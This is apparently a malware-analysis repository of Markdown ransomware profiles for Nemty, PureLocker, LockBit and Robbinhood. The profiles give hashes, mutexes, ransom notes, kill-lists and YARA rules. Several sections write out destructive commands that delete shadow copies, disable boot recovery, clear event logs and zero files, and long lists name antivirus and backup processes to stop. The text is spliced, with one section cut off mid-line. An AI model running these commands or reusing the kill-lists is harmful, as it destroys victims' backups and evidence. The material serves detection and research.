| 55 | ## Notes 56 | - Developed by the same authors who previously distributed JSWorm 57 | - Uses a `RSA 8192-bit` public key 58 | - Demands around `$1,000` for decrypting the files 59 | - Ransom extension: `.nemty`, later versions seen a change in the template: `._NEMTY_ _`, for ex.: `._NEMTY_VOv3Zme_` 60 | - Ransom note: `NEMTY-DECRYPT.txt`, later a random value was introduced `NEMTY_VFRLXV9-DECRYPT.txt` 61 | - Has network enumeration capability 62 | - Checks in to `api.db-ip.com/v2/free/[IP]/countryName` 63 | - At the end of every encrypted file, there's a marker of the same random value, which the extension containes 64 | - Internal TOR proxy goes to 127.0.0.1:9050/public/gate?data= (wrong port, 9051) 65 | 66 | ## Commands seen 67 | ``` 68 | vssadmin.exe delete shadows / all / quiet 69 | bcdedit / set {default} bootstatuspolicy ignoreallfailures 70 | bcdedit / set {default} recoveryenabled no 71 | wbadmin delete catalog -quiet 72 | wmic shadowcopy delete 73 | cmd.exe / c vssadmin resize shadowstorage / for = C: / on = C: / maxsize = 401MB 74 | cmd.exe / c vssadmin resize shadowstorage / for = C: / on = C: / maxsize = unbounded 75 | ``` 76 | 77 | ## Seen mutexes 78 | - hate 79 | - fuckav 80 | - just_a_little_game 81 | - just_a_game 82 | 83 | ## Blacklisted extensions 84 | ``` 85 | .cab, .CAB 86 | .cmd, .CMD 87 | .com, .COM 88 | .cpl, .CPL 89 | .dll, .DLL 90 | .exe, .EXE 91 | .ini, .INI 92 | .lnk, .LNK 93 | .log, .LOG 94 | .ttf, .TTF 95 | .url, .URL 96 | .nemty 97 | ``` 98 | 99 | ## Skip encrypting these files/folders 100 | ``` 101 | DECRYPT.txt 102 | $RECYCLE.BIN 103 | rsa 104 | NTDETECT.COM 105 | ntldr 106 | MSDOS.SYS 107 | IO.SYS 108 | boot.ini 109 | AUTOEXEC.BAT 110 | ntuser.dat 111 | desktop.ini 112 | CONFIG.SYS 113 | RECYCLER 114 | BOOTSECT.BAK 115 | bootmgr 116 | programdata 117 | appdata 118 | windows 119 | Microsoft 120 | Common Files 121 | ``` 122 | 123 | ## Anti-CIS 124 | - Russia 125 | - Belarus 126 | - Kazakhstan 127 | - Tajikistan 128 | - Ukraine 129 | - Azerbaijan 130 | - Armenia 131 | - Kyrgyzstan 132 | - Moldova 133 | 134 | ## Stopped services 135 | ``` 136 | DbxSvc 137 | OracleXETNSListener 138 | OracleServiceXE 139 | AcrSch2Svc 140 | AcronisAgent 141 | Apache2.4 142 | SQLWriter 143 | MSSQL$SQLEXPRESS 144 | MSSQLServerADHelper100 145 | MongoDB 146 | SQLAgent$SQLEXPRESS 147 | SQLBrowser 148 | ``` 149 | 150 | ## Process killlist 151 | ``` 152 | sql 153 | winword 154 | wordpad 155 | outlook 156 | thunderbird 157 | oracle 158 | excel 159 | onenote 160 | virtualboxvm 161 | node 162 | QBW32 163 | WBGX 164 | Teams 165 | Flow 166 | ``` 167 | 168 | ## Ransom note 169 | ``` 170 | ---=== NEMTY PROJECT ===--- 171 | [+] Whats Happen? [+] 172 | Your files are encrypted, and currently unavailable. You can check it: all files on you computer has extension .nemty 173 | By the way, everything is possible to restore, but you need to follow our instructions. Otherwise, you cant return your data (NEVER). 174 | [+] What guarantees? [+] 175 | It's just a business. We absolutely do not care about you and your deals, except getting benefits. 176 | If we do not do our work and liabilities - nobody will not cooperate with us. 177 | It's not in our interests. 178 | If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. 179 | In practise - time is much more valuable than money. 180 | [+] How to get access on website? [+] 181 | 1) Download and install TOR browser from this site: https://torproject.org/ 182 | 2) Open our website: zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/pay 183 | When you open our website, follow the instructions and you will get your files back. 184 | Configuration file path: C:\Users\admin 185 | ``` -------------------------------------------------------------------------------- /Ransomware/PureLocker.md: -------------------------------------------------------------------------------- 1 | # PureLocker ransomware 2 | Discovered by IBM IRIS X-Force and IntezerLabs 3 | 4 | ## SHA256 hashes 5 | `1fd15c358e2df47f5dde9ca2102c30d5e26d202642169d3b2491b89c9acc0788` 6 | `300c58478a93e4160dbbd01598d2f1df3f51519687d2c954682ecb7813386ab4` 7 | `c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d` 8 | 9 | ## References 10 | https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e 11 | https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/ 12 | 13 | ## Notes 14 | - Written in PureBasic 15 | - Execute with regsvr32 /s /i 16 | - Mutex: 04780006780E6407 17 | - XOR key: D3F3CEBB972965 18 | - Decoded string: CR1 19 | - Encrypted extension: .CR1 20 | - Claims to encrypt with: AES-256-CBC + RSA-4096 21 | - Encryption: 32-byte random AES key and 16-byte random IV 22 | - Logfile: dbg.txt 23 | - Ransom note: YOUR_FILES.txt 24 | - Shadow copy adjustment: wmic shadowstorage SET MaxSpace=337000000 25 | - Ransom e-mail: cr1-silvergold1@protonmail.com 26 | 27 | ## Yara rules 28 | Some of these rules are solely VT retro,- livehunt rules and not suitable for deploying in production networks. 29 | 30 | ```yara 31 | // VT livehunt rule - Detect new PureLocker CARO sigs 32 | rule purelocker_carosigs 33 | { 34 | meta: 35 | author = "Albert Zsigovits" 36 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 37 | family = "PureLocker ransomware" 38 | 39 | condition: 40 | new_file 41 | and 42 | ( 43 | (signatures matches /.*PureLocker.*/) 44 | or 45 | (signatures matches /.*PURELOCKER.*/) 46 | ) 47 | } 48 | 49 | // VT livehunt rule - Detect new PureLocker based on the previously seen imphashes 50 | rule purelocker_imphash 51 | { 52 | meta: 53 | author = "Albert Zsigovits" 54 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 55 | family = "PureLocker ransomware" 56 | 57 | condition: 58 | new_file 59 | and 60 | ( 61 | (imphash contains "cc2d1da2e5791504e1bf336fd23d0a28") 62 | or 63 | (imphash contains "59e0431c441419a7ff332859b546442e") 64 | or 65 | (imphash contains "e0b78fab94dec81f75eba07d46605381") 66 | ) 67 | } 68 | 69 | // c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d 70 | // VT livehunt rule - Timestomped - 2001-08-17 20:52:32 71 | // FP prone 72 | import "pe" 73 | rule purelocker_timestamp 74 | { 75 | meta: 76 | author = "Albert Zsigovits" 77 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 78 | family = "PureLocker ransomware" 79 | 80 | condition: 81 | new_file 82 | and 83 | filesize < 200KB 84 | and 85 | pe.timestamp == 998081552 86 | } 87 | 88 | // This unique resource section matches in both seen samples, but might produce FPs 89 | import "pe" 90 | rule purelocker_sections 91 | { 92 | meta: 93 | author = "Albert Zsigovits" 94 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 95 | family = "PureLocker ransomware" 96 | 97 | condition: 98 | pe.number_of_sections == 6 99 | and 100 | pe.sections[4].name == ".rsrc" 101 | and 102 | pe.sections[4].virtual_size == 1068 103 | and 104 | pe.sections[4].raw_data_size == 1536 105 | } 106 | 107 | // VT livehunt rule - Match on previously seen filenames, might produce FPs 108 | rule purelocker_filename 109 | { 110 | meta: 111 | author = "Albert Zsigovits" 112 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 113 | family = "PureLocker ransomware" 114 | 115 | condition: 116 | new_file 117 | and 118 | filesize < 200KB 119 | and 120 | ( 121 | (file_name contains "cryptopp") 122 | or 123 | (file_name contains "cryptopp.dll") 124 | or 125 | (file_name contains "cryptopp_w2.dll") 126 | ) 127 | } 128 | 129 | import "pe" 130 | rule purelocker_exports 131 | { 132 | meta: 133 | author = "Albert Zsigovits" 134 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 135 | family = "PureLocker ransomware" 136 | 137 | condition: 138 | new_file 139 | and 140 | pe.exports("DeleteMusic") 141 | and 142 | pe.exports("FindMusic") 143 | and 144 | pe.exports("MoveMusic") 145 | and 146 | pe.exports("SeekMusic") 147 | and 148 | pe.exports("UploadMusic") 149 | and 150 | pe.exports("DllRegisterServer") 151 | } 152 | 153 | rule purelocker_pe 154 | { 155 | meta: 156 | author = "Albert Zsigovits" 157 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 158 | family = "PureLocker ransomware" 159 | 160 | strings: 161 | $file = "cryptopp.dll" 162 | $import0 = "DeleteMusic" 163 | $import1 = "FindMusic" 164 | $import2 = "MoveMusic" 165 | $import3 = "SeekMusic" 166 | $import4 = "UploadMusic" 167 | $import5 = "DllRegisterServer" 168 | 169 | condition: 170 | uint16(0) == 0x5a4d and filesize < 200KB and all of them 171 | } 172 | 173 | rule purelocker_inmemory_note 174 | { 175 | meta: 176 | author = "Albert Zsigovits" 177 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 178 | family = "PureLocker ransomware" 179 | 180 | strings: 181 | $note0 = "To decrypt your files contact us at: cr1-silvergold1@protonmail.com" wide 182 | $note1 = "Shadows copies were removed, original files were overwritten, renamed and deleted using safe methods." wide 183 | $note2 = ", after that the recovery of your files will not be possible." wide 184 | $note3 = "Your private key will be deleted after 7 days starting from: " wide 185 | $note4 = "All your files have been encrypted using: AES-256-CBC + RSA-4096." wide 186 | $note5 = "Recovery is not possible without own RSA-4096 private key." wide 187 | $note6 = "Only we can decrypt your files!" wide 188 | 189 | condition: 190 | 4 of them 191 | } 192 | 193 | rule purelocker_inmemory 194 | { 195 | meta: 196 | author = "Albert Zsigovits" 197 | reference = "c592c52381d43a6604b3fc657c5dc6bee61aa288bfa37e8fc54140841267338d" 198 | family = "PureLocker ransomware" 199 | 200 | strings: 201 | $pure0 = "dbg.txt" wide 202 | $pure1 = "YOUR_FILES.txt" wide 203 | $pure2 = "CR1" wide 204 | $pure3 = "/s /i" wide 205 | $pure4 = "/V /C set " wide 206 | $pure5 = "& Nul & \"%s\" 35 | - ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s" 36 | 37 | ## Registry keys 38 | - SOFTWARE\LockBit 39 | - SOFTWARE\LockBit\full 40 | - SOFTWARE\LockBit\Public 41 | 42 | ## Folders skip-list 43 | ``` 44 | $windows.~bt 45 | intel 46 | msocache 47 | $recycle.bin 48 | $windows.~ws 49 | tor browser 50 | boot 51 | system volume information 52 | perflogs 53 | google 54 | application data 55 | windows 56 | windows.old 57 | appdata 58 | Windows nt 59 | Msbuild 60 | Microsoft 61 | All users 62 | Mozilla 63 | ``` 64 | 65 | ## Files skip-list 66 | ``` 67 | ntldr 68 | ntuser.dat.log 69 | bootsect.bak 70 | autorun.inf 71 | ``` 72 | 73 | ## Service stop-list 74 | ``` 75 | wrapper 76 | DefWatch 77 | ccEvtMgr 78 | ccSetMgr 79 | SavRoam 80 | Sqlservr 81 | sqlagent 82 | sqladhlp 83 | Culserver 84 | RTVscan 85 | sqlbrowser 86 | SQLADHLP 87 | QBIDPService 88 | Intuit.QuickBooks.FCS 89 | QBCFMonitorService 90 | sqlwriter 91 | msmdsrv 92 | tomcat6 93 | zhudongfangyu 94 | vmware-usbarbitator64 95 | vmware-converter 96 | dbsrv12 97 | dbeng8 98 | MSSQL$MICROSOFT##WID 99 | MSSQL$VEEAMSQL2012 100 | SQLAgent$VEEAMSQL2012 101 | SQLBrowser 102 | SQLWriter 103 | FishbowlMySQL 104 | MSSQL$MICROSOFT##WID 105 | MySQL57 106 | MSSQL$KAV_CS_ADMIN_KIT 107 | MSSQLServerADHelper100 108 | SQLAgent$KAV_CS_ADMIN_KIT 109 | msftesql-Exchange 110 | MSSQL$MICROSOFT##SSEE 111 | MSSQL$SBSMONITORING 112 | MSSQL$SHAREPOINT 113 | MSSQLFDLauncher$SBSMONITORING 114 | MSSQLFDLauncher$SHAREPOINT 115 | SQLAgent$SBSMONITORING 116 | SQLAgent$SHAREPOINT 117 | QBFCService 118 | QBVSS 119 | YooBackup 120 | YooIT 121 | svc$ 122 | MSSQL 123 | MSSQL$ 124 | memtas 125 | mepocs 126 | sophos 127 | veeam 128 | backup 129 | bedbg 130 | PDVFSService 131 | BackupExecVSSProvider 132 | BackupExecAgentAccelerator 133 | BackupExecAgentBrowser 134 | BackupExecDiveciMediaService 135 | BackupExecJobEngine 136 | BackupExecManagementService 137 | BackupExecRPCService 138 | MVArmor 139 | MVarmor64 140 | stc_raw_agent 141 | VSNAPVSS 142 | VeeamTransportSvc 143 | VeeamDeploymentService 144 | VeeamNFSSvc 145 | AcronisAgent 146 | ARSM 147 | AcrSch2Svc 148 | CASAD2DWebSvc 149 | CAARCUpdateSvc 150 | WSBExchange 151 | MSExchange 152 | MSExchange$ 153 | LanmanWorkstation 154 | WebClient 155 | ``` 156 | 157 | ## Process kill-list 158 | ``` 159 | wxServer 160 | wxServerView 161 | sqlmangr 162 | RAgui 163 | supervise 164 | Culture 165 | Defwatch 166 | winword 167 | QBW32 168 | QBDBMgr 169 | qbupdate 170 | axlbridge 171 | httpd 172 | fdlauncher 173 | MsDtSrvr 174 | java 175 | 360se 176 | 360doctor 177 | wdswfsafe 178 | fdhost 179 | GDscan 180 | ZhuDongFangYu 181 | QBDBMgrN 182 | mysqld 183 | AutodeskDesktopApp 184 | acwebbrowser 185 | Creative Cloud 186 | Adobe Desktop Service 187 | CoreSync 188 | Adobe CEF Helper 189 | node 190 | AdobeIPCBroker 191 | sync-taskbar 192 | sync-worker 193 | InputPersonalization 194 | AdobeCollabSync 195 | BrCtrlCntr 196 | BrCcUxSys 197 | SimplyConnectionManager 198 | Simply.SystemTrayIcon 199 | fbguard 200 | fbserver 201 | ONENOTEM 202 | wsa_service 203 | koaly-exp-engine-service 204 | TeamViewer_Service 205 | TeamViewer 206 | tv_w32 207 | tv_x64 208 | TitanV 209 | Ssms 210 | notepad 211 | RdrCEF 212 | oracle 213 | ocssd 214 | dbsnmp 215 | synctime 216 | agntsvc 217 | isqlplussvc 218 | xfssvccon 219 | mydesktopservice 220 | ocautoupds 221 | encsvc 222 | firefox 223 | tbirdconfig 224 | mydesktopqos 225 | ocomm 226 | dbeng50 227 | sqbcoreservice 228 | excel 229 | infopath 230 | msaccess 231 | mspub 232 | onenote 233 | outlook 234 | powerpnt 235 | steam 236 | thebat 237 | thunderbird 238 | visio 239 | wordpad 240 | bedbh 241 | vxmon 242 | benetns 243 | bengien 244 | pvlsvr 245 | beserver 246 | raw_agent_svc 247 | vsnapvss 248 | CagService 249 | DellSystemDetect 250 | EnterpriseClient 251 | VeeamDeploymentSvc 252 | ``` 253 | 254 | ## Extension list 255 | ``` 256 | .msstyles 257 | .sqlitedb 258 | .sqlite3 259 | .diagcab 260 | .diagcfg 261 | .diagpkg 262 | .sqlite 263 | .db-shm 264 | .db-wal 265 | .dacpac 266 | .theme 267 | .icns 268 | .lock 269 | .tmd 270 | .ckp 271 | .dbc 272 | .sql 273 | .mwb 274 | .rar 275 | .dbv 276 | .frm 277 | .mdf 278 | .dbt 279 | .qry 280 | .ndf 281 | .sdb 282 | .myd 283 | .mrg 284 | .db3 285 | .dbs 286 | .dbf 287 | .sdf 288 | .zip 289 | .rdp 290 | .bin 291 | .hlp 292 | .shs 293 | .drv 294 | .wpx 295 | .bat 296 | .rom 297 | .msc 298 | .spl 299 | .ps1 300 | .msu 301 | .ics 302 | .key 303 | .exe 304 | .dll 305 | .lnk 306 | .ico 307 | .hlp 308 | .sys 309 | .drv 310 | .cur 311 | .idx 312 | .ini 313 | .reg 314 | .mp3 315 | .386 316 | .cmd 317 | .ani 318 | .adv 319 | .msi 320 | .msp 321 | .com 322 | .nls 323 | .ocx 324 | .mpa 325 | .cpl 326 | .mod 327 | .hta 328 | .prf 329 | .rtp 330 | ``` 331 | 332 | ## Ransom note: 333 | ``` 334 | All your important files are encrypted! 335 | Any attempts to restore your files with the thrid-party software will be fatal for your files! 336 | RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. 337 | There is only one way to get your files back: 338 | 339 | | 1. Download Tor browser - https://www.torproject.org/ and install it. 340 | | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/? 341 | This link only works in Tor Browser! 342 | | 3. Follow the instructions on this page 343 | 344 | ### Attention! ### 345 | # Do not rename encrypted files. 346 | # Do not try to decrypt using third party software, it may cause permanent data loss. 347 | # Decryption of your files with the help of third parties may cause increased price(they add their fee to our) 348 | # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org 349 | # Tor Browser user manual https://tb-manual.torproject.org/about 350 | 351 | !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR. 352 | ``` 353 | 354 | ## SHA256 355 | - 0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76 356 | - 0e66029132a885143b87b1e49e32663a52737bbff4ab96186e9e5e829aa2915f 357 | - 0f178bc093b6b9d25924a85d9a7dde64592215599733e83e3bbc6df219564335 358 | - 0f5d71496ab540c3395cfc024778a7ac5c6b5418f165cc753ea2b2befbd42d51 359 | - 13849c0c923bfed5ab37224d59e2d12e3e72f97dc7f539136ae09484cbe8e5e0 360 | - 15a7d528587ffc860f038bb5be5e90b79060fbba5948766d9f8aa46381ccde8a 361 | - 1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18 362 | - 1e3bf358c76f4030ffc4437d5fcd80c54bd91b361abb43a4fa6340e62d986770 363 | - 256e2bf5f3c819e0add95147b606dc314bbcbac32a801a59584f43a4575e25dc 364 | - 26b6a9fecfc9d4b4b2c2ff02885b257721687e6b820f72cf2e66c1cae2675739 365 | - 2b8117925b4b5b39192aaaea130426bda39ebb5f363102641003f2c2cb33b785 366 | - 3f29a368c48b0a851db473a70498e168d59c75b7106002ac533711ca5cfabf89 367 | - 410c884d883ebe2172507b5eadd10bc8a2ae2564ba0d33b1e84e5f3c22bd3677 368 | - 4acc0b5ed29adf00916dea7652bcab8012d83d924438a410bee32afbcdb995cc 369 | - 5b9bae348788cd2a1ce0ba798f9ae9264c662097011adbd44ecfab63a8c4ae28 370 | - 6292c2294ad1e84cd0925c31ee6deb7afd300f935004a9e8a7a43bf80034abae 371 | - 69d9dd7fdd88f33e2343fb391ba063a65fe5ffbe649da1c5083ec4a67c525997 372 | - 83ab7a2bcac146db472f3b930c01af5b6d3d978ead7b14a9d0ac16e1a76e9f9d 373 | - 9bc98d15f243257c1b5bca59464abe68c680cd5482ba9f5082201dde41a016cf 374 | - a03326ac8efa930e10091a374d40ddab9f7c2f12246d6ef7983bad93256f1f3a 375 | - a0085da4a920e92d8f59fefa6f25551655ca911382b5e34df76a9333ac8b7214 376 | - a08fbf01d02097094b725101309b2bf7fefc2e27724654b840b87e091aa5c9b9 377 | - a1360645cf3113715cc023d2e4cf9f6f3a6278abcf4499f0ba7cd76c82839eb0 378 | - c8205792fbc0a5efc6b8f0f2257514990bfaa987768c4839d413dd10721e8871 379 | - ce8559871b410e23057393eb2d9fb76ec902da2ff1f8006ad312c81852a41f6f 380 | - e3f236e4aeb73f8f8f0caebe46f53abbb2f71fa4b266a34ab50e01933709e877 381 | - ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d 382 | - ffbb6c4d8d704a530bdd557890f367ad904c09c03f53fda5615a7208a0ea3e4d 383 | 384 | ## Decryptors 385 | - 09e956d140d6879cf7eacbb65dcbfbe1dea1961a31c5d0f834343ef2c886ccc1 386 | - 9bc98d15f243257c1b5bca59464abe68c680cd5482ba9f5082201dde41a016cf 387 | 388 | ## VT perks: 389 | - vhash:"015036656d5223z12z3e05031f1z37z406001a5zb7z" 390 | - imphash:"be232aa2621354bf5dd7b405cc99198c" 391 | 392 | ## YARA rules 393 | ``` 394 | rule lockbit_clsids 395 | { 396 | strings: 397 | $id1 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" ascii wide 398 | $id2 = "{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}" ascii wide 399 | $id3 = "{02B49784-1CA2-436C-BC08-72FA3956507D}" ascii wide 400 | $id4 = "{BEF590BE-11A6-442A-A85B-656C1081E04C}" ascii wide 401 | 402 | condition: 403 | 3 of them 404 | } 405 | ``` 406 | 407 | ``` 408 | rule lockbit_mutex 409 | { 410 | strings: 411 | $mutex = "XO1XADpO01" ascii wide 412 | 413 | condition: 414 | all of them 415 | } 416 | ``` 417 | 418 | ``` 419 | rule lockbit_uac 420 | { 421 | strings: 422 | $uac0 = "Elevation:Administrator!new:" ascii wide 423 | $uac1 = "DisplayCalibrator" ascii wide 424 | $uac2 = "Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration" ascii wide 425 | 426 | condition: 427 | all of them 428 | } 429 | ``` 430 | 431 | ``` 432 | rule lockbit_cmd 433 | { 434 | strings: 435 | $cmd0 = "vssadmin Delete Shadows /All /Quiet" ascii wide 436 | $cmd1 = "bcdedit /set {default} recoveryenabled No" ascii wide 437 | $cmd2 = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" ascii wide 438 | $cmd3 = "wbadmin DELETE SYSTEMSTATEBACKUP" ascii wide 439 | $cmd4 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" ascii wide 440 | $cmd5 = "wmic SHADOWCOPY /nointeractive" ascii wide 441 | $cmd6 = "wevtutil cl security" ascii wide 442 | $cmd7 = "wevtutil cl system" ascii wide 443 | $cmd8 = "wevtutil cl application" ascii wide 444 | 445 | condition: 446 | 6 of them 447 | } 448 | ``` 449 | 450 | ``` 451 | rule lockbit_priv_masq 452 | { 453 | strings: 454 | $masq = { ff 15 [1-4] 85 ?? 0f [1-5] 68 04 01 00 00 8d [1-5] 50 ff 15 [1-4] 8b [1-5] 8d [1-5] 0f ?? ?? 8d ?? ?? 66 ?? ?? 8d ?? ?? 66 ?? ?? 75 ?? 0f ?? ?? [1-4] be 3f [1-3] 66 ?? ?? c7 45 ?? [1-4] 66 ?? ?? ?? } 455 | 456 | $priv = { ff 15 [1-4] 85 ?? 74 ?? 8d ?? ?? 50 8d ?? ?? 50 6a 00 ff 15 [1-4] 85 ?? 74 ?? 39 ?? ?? 75 ?? 8d ?? ?? 50 6a 04 8d ?? ?? 50 6a 13 ff 75 ?? ff 15 [1-4] 85 ?? 7? ?? ?? ?? [1-4] 3d [1-4] 74 ?? 3d [1-4] 74 ?? 85 ?? 7f ?? 8b ?? eb ?? 0f ?? ?? 81 [1-5] eb ?? 8d ?? ?? 50 8d ?? ?? 50 ff 75 ?? ff 15 } 457 | 458 | condition: 459 | $masq or $priv 460 | } 461 | ``` 462 | -------------------------------------------------------------------------------- /Ransomware/Robbinhood.md: -------------------------------------------------------------------------------- 1 | # Robbinhood / Robbnhold / Robnhold ransomware 2 | 3 | ## Dropped files: 4 | - steel.exe 5 | - robnr.exe 6 | - gdrv.sys 7 | - rbnl.sys 8 | - plist.txt 9 | 10 | ## PDB: 11 | - C:\Users\Mikhail\Desktop\Robnhold\x64\Win7Release\Robbnhold.pdb 12 | 13 | ## Pipes: 14 | - \Device\Robnhold 15 | - \DosDevices\Robnhold 16 | 17 | ## pList.txt: 18 | ``` 19 | gdmms.exe 20 | sntlsrtsrvr.exe 21 | spnsrvnt.exe 22 | sntlkeyssrvr.exe 23 | a2guard.exe 24 | a2service.exe 25 | a2start.exe 26 | acaas.exe 27 | acaegmgr.exe 28 | acaif.exe 29 | acais.exe 30 | acctmgr.exe 31 | ahnsd.exe 32 | ahnsdsv.exe 33 | alertsvc.exe 34 | almon.exe 35 | alsvc.exe 36 | alunotify.exe 37 | aluschedulersvc.exe 38 | anti_ransom.exe 39 | anti_ransom_gui.exe 40 | anvir.exe 41 | appsvc32.exe 42 | apvxdwin.exe 43 | ashavast.exe 44 | ashbug.exe 45 | ashchest.exe 46 | ashcmd.exe 47 | ashdisp.exe 48 | ashenhcd.exe 49 | ashlogv.exe 50 | ashmaisv.exe 51 | ashpopwz.exe 52 | ashquick.exe 53 | ashserv.exe 54 | ashsimp2.exe 55 | ashsimpl.exe 56 | ashskpcc.exe 57 | ashskpck.exe 58 | ashupd.exe 59 | ashwebsv.exe 60 | asupport.exe 61 | aswdisp.exe 62 | aswidsagent.exe 63 | aswregsvr.exe 64 | aswserv.exe 65 | aswupdsv.exe 66 | aswwebsv.exe 67 | atwsctsk.exe 68 | autoup.exe 69 | avadmin.exe 70 | avas.exe 71 | avastemupdate.exe 72 | avastsvc.exe 73 | avastui.exe 74 | avcenter.exe 75 | avcom.exe 76 | avconfig.exe 77 | avemupdate.exe 78 | avengine.exe 79 | avesvc.exe 80 | avfwsvc.exe 81 | avgam.exe 82 | avgamsvr.exe 83 | avgas.exe 84 | avgcc.exe 85 | avgcc32.exe 86 | avgcefrend.exe 87 | avgchsvx.exe 88 | avgcmgr.exe 89 | avgcsrva.exe 90 | avgcsrvx.exe 91 | avgctrl.exe 92 | avgdiag.exe 93 | avgemc.exe 94 | avgemca.exe 95 | avgemcx.exe 96 | avgfws.exe 97 | avgfws8.exe 98 | avgfws9.exe 99 | avgfwsrv.exe 100 | avginet.exe 101 | avgmfapx.exe 102 | avgmsvr.exe 103 | avgnsa.exe 104 | avgnsx.exe 105 | avgnt.exe 106 | avgrsa.exe 107 | avgrssvc.exe 108 | avgrsx.exe 109 | avgscanx.exe 110 | avgserv.exe 111 | avgserv9.exe 112 | avgsvc.exe 113 | avgtray.exe 114 | avguard.exe 115 | avgui.exe 116 | avgupd.exe 117 | avgupdln.exe 118 | avgupsvc.exe 119 | avgvv.exe 120 | avgw.exe 121 | avgwb.dat 122 | avgwdsvc.exe 123 | avgwizfw.exe 124 | avira.messenger.exe 125 | avira.servicehost.exe 126 | avira.systray.exe 127 | avkbackupservice.exe 128 | avkcmd.exe 129 | avkproxy.exe 130 | avkservice.exe 131 | avktray.exe 132 | avkwctl.exe 133 | avkwctlx64.exe 134 | avkwscpe.exe 135 | avmailc.exe 136 | avmcdlg.exe 137 | avnotify.exe 138 | avp.exe 139 | avpcc.exe 140 | avpexec.exe 141 | avpm.exe 142 | avpncc.exe 143 | avps.exe 144 | avpsus.exe 145 | avpui.exe 146 | avpupd.exe 147 | avscan.exe 148 | avshadow.exe 149 | avss.exe 150 | avwebgrd.exe 151 | axengine.exe 152 | bavtray.exe 153 | bdagent.exe 154 | bdc.exe 155 | bdlite.exe 156 | bdmcon.exe 157 | bdredline.exe 158 | bdservicehost.exe 159 | bdss.exe 160 | bdsubmit.exe 161 | bdwtxag.exe 162 | bhipssvc.exe 163 | bullguard.exe 164 | bullguardbhvscanner.exe 165 | bullguardscanner.exe 166 | bullguardtray.exe 167 | bullguardupdate.exe 168 | caissdt.exe 169 | cavscan.exe 170 | cavtray.exe 171 | cavwp.exe 172 | ccap.exe 173 | ccapp.exe 174 | ccevtmgr.exe 175 | ccproxy.exe 176 | ccpxysvc.exe 177 | ccsetmgr.exe 178 | ccsvchst.exe 179 | cfpconfg.exe 180 | checkup.exe 181 | cis.exe 182 | cistray.exe 183 | cka.exe 184 | clamscan.exe 185 | clamtray.exe 186 | clamwin.exe 187 | clps.exe 188 | clpsla.exe 189 | clpsls.exe 190 | clshield.exe 191 | cmdagent.exe 192 | cmdinstall.exe 193 | cmgrdian.exe 194 | cntaosmgr.exe 195 | comhost.exe 196 | coreframeworkhost.exe 197 | coreserviceshell.exe 198 | cpdclnt.exe 199 | cpf.exe 200 | cpntsrv.exe 201 | csinject.exe 202 | csinsm32.exe 203 | csinsmnt.exe 204 | cylancesvc.exe 205 | cylanceui.exe 206 | dbserv.exe 207 | dbsrv9.exe 208 | defwatch 209 | defwatch.exe 210 | deloeminfs.exe 211 | devmgmtservice.exe 212 | diskmon.exe 213 | djsnetcn.exe 214 | doscan.exe 215 | drsdkcaller.exe 216 | drwagntd.exe 217 | drwagnui.exe 218 | drweb.exe 219 | drweb32.exe 220 | drweb32w.exe 221 | drweb386.exe 222 | drwebcgp.exe 223 | drwebcom.exe 224 | drwebdc.exe 225 | drwebmng.exe 226 | drwebscd.exe 227 | drwebupw.exe 228 | drwebwcl.exe 229 | drwebwin.exe 230 | drwinst.exe 231 | drwupgrade.exe 232 | dwantispam.exe 233 | dwarkdaemon.exe 234 | dwengine.exe 235 | dwhwizrd.exe 236 | dwnetfilter.exe 237 | dwscanner.exe 238 | dwservice.exe 239 | dwwatcher.exe 240 | egui.exe 241 | eguiproxy.exe 242 | ehttpsrv.exe 243 | ekrn.exe 244 | engineserver.exe 245 | era.exe 246 | eraagent.exe 247 | eraserver.exe 248 | eshasrv.exe 249 | eventparser.exe 250 | fameh32.exe 251 | fch32.exe 252 | ffselect.exe 253 | fpavserver.exe 254 | fprottray.exe 255 | frameworkservic.exe 256 | frameworkservice.exe 257 | fsaua.exe 258 | fsav32.exe 259 | fsavgui.exe 260 | fscuif.exe 261 | fsdfwd.exe 262 | fsgk32.exe 263 | fsgk32st.exe 264 | fsguidll.exe 265 | fsguiexe.exe 266 | fshdll32.exe 267 | fshoster32.exe 268 | fshoster64.exe 269 | fsm32.exe 270 | fsma32.exe 271 | fsmb32.exe 272 | fsorsp.exe 273 | fspc.exe 274 | fsqh.exe 275 | fssm32.exe 276 | fwcfg.exe 277 | fwinst.exe 278 | gdagentsrv.exe 279 | gdagentui.exe 280 | gddcinst32.exe 281 | gdfirewalltray.exe 282 | gdfwsvc.exe 283 | gdkbfltexe32.exe 284 | gdsc.exe 285 | gdscan.exe 286 | gdwfpcd_inst.exe 287 | ghost_2.exe 288 | ghosttray.exe 289 | gmer.exe 